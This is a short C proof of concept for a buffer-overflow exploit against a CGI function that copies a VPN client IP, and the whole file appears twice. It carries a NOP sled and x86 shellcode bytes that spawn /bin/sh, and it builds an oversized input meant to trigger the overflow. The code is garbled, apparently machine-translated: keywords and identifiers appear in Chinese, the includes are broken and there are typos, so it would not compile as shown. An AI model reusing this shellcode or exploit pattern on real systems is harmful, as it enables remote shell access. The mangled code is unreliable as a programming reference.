#include stdio.h
#include string.h
#define max_len 256
#Define Buffer_overrun_length 50
#define shellcode_length 32
//NOP雪橇增加了成功执行壳牌的机会
char nop_sled [shellcode_length]='\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90';
//shellCode执行/bin/sh
char shellCode [shellcode_length]='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80';
void apply_cgi(char *vpn_client_ip){
char buffer [max_len];
strncpy(buffer,vpn_client_ip,max_len);
printf('客户端IP:%s \ n',buffer);
}
int main(){
char输入[max_len + buffer_overrun_length]={0};
//使用恶意输入创建缓冲区
//包括NOP雪橇,ShellCode和溢出数据
int offset=strlen(nop_sled) + strlen(shellCode)-buffer_overrun_length;
strncpy(输入[0],nop_ssled,offset);
strncpy(输入[offset],shellCode,shellcode_length);
输入[max_len + buffer_overrun_length -1]='\ x00';
//调用脆弱功能以触发缓冲区溢出
apply_cgi(输入);
返回0;
}
#include string.h
#define max_len 256
#Define Buffer_overrun_length 50
#define shellcode_length 32
//NOP雪橇增加了成功执行壳牌的机会
char nop_sled [shellcode_length]='\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90';
//shellCode执行/bin/sh
char shellCode [shellcode_length]='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80';
void apply_cgi(char *vpn_client_ip){
char buffer [max_len];
strncpy(buffer,vpn_client_ip,max_len);
printf('客户端IP:%s \ n',buffer);
}
int main(){
char输入[max_len + buffer_overrun_length]={0};
//使用恶意输入创建缓冲区
//包括NOP雪橇,ShellCode和溢出数据
int offset=strlen(nop_sled) + strlen(shellCode)-buffer_overrun_length;
strncpy(输入[0],nop_ssled,offset);
strncpy(输入[offset],shellCode,shellcode_length);
输入[max_len + buffer_overrun_length -1]='\ x00';
//调用脆弱功能以触发缓冲区溢出
apply_cgi(输入);
返回0;
}